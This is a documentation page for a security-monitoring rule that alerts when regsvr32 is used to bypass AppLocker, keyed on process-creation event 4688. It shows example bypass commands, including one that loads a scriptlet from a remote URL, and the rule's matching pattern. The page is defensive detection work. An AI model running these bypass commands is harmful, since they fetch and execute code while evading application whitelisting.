Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was execuited

SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr (Rule)

AppLocker Bypass Techniques using Regsvr32.exe (greg)
Note: The following is already contained in SCUBA_RULE_Applocker_Bypass

Examples:
regsvr32 /s /n /u /i:file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll

Element properties:

Member Modules:

Source Code:

<Rule ID="SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr" Enabled="true" Target="WindowsEventCollectorDiscovery!WindowsEventCollectorDiscovery.EventLogCollectorServer" ConfirmDelivery="true" Remotable="true" Priority="Normal" DiscardLevel="100">

  <Category>Alert</Category>

  <DataSources>

    <DataSource ID="DS" TypeID="Windows!Microsoft.Windows.EventProvider">

      <ComputerName>$Target/Host/Property[Type="Windows!Microsoft.Windows.Computer"]/NetworkName$</ComputerName>

      <LogName>ForwardedEvents</LogName>

      <AllowProxying>true</AllowProxying>

      <Expression>

        <And>

          <Expression>

            <SimpleExpression>

              <ValueExpression>

                <XPathQuery Type="UnsignedInteger">EventDisplayNumber</XPathQuery>

              </ValueExpression>

              <Operator>Equal</Operator>

              <ValueExpression>

                <Value Type="UnsignedInteger">4688</Value>

              </ValueExpression>

            </SimpleExpression>

          </Expression>

          <Expression>

            <RegExExpression>

              <ValueExpression>

                <XPathQuery Type="String">Params/Param[9]</XPathQuery>

              </ValueExpression>

              <Operator>ContainsSubstring</Operator>

              <Pattern>/s /n /u /i:</Pattern>

            </RegExExpression>

          </Expression>

          <Expression>

            <Or>

              <Expression>

                <RegExExpression>

                  <ValueExpression>

                    <XPathQuery Type="String">Params/Param[9]</XPathQuery>

                  </ValueExpression>

                  <Operator>ContainsSubstring</Operator>

                  <Pattern>scrobj.dll</Pattern>

                </RegExExpression>

              </Expression>

              <Expression>

                <RegExExpression>

                  <ValueExpression>

                    <XPathQuery Type="String">Params/Param[9]</XPathQuery>

                  </ValueExpression>

                  <Operator>ContainsSubstring</Operator>

                  <Pattern>.sct</Pattern>

                </RegExExpression>

              </Expression>

            </Or>

          </Expression>

        </And>

      </Expression>

    </DataSource>

  </DataSources>

  <WriteActions>

    <WriteAction ID="Alert" TypeID="Health!System.Health.GenerateAlert">

      <Priority>1</Priority>

      <Severity>2</Severity>

      <AlertName/>

      <AlertDescription/>

      <AlertOwner/>

      <AlertMessageId>$MPElement[Name="SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr.AlertMessage"]$</AlertMessageId>

      <AlertParameters>

        <AlertParameter1>$Data[Default='']/EventDescription$</AlertParameter1>

      </AlertParameters>

      <Suppression/>

      <Custom1/>

      <Custom2/>

      <Custom3/>

      <Custom4/>

      <Custom5/>

      <Custom6/>

      <Custom7/>

      <Custom8/>

      <Custom9/>

      <Custom10>Security Monitoring</Custom10>

    </WriteAction>

  </WriteActions>

</Rule>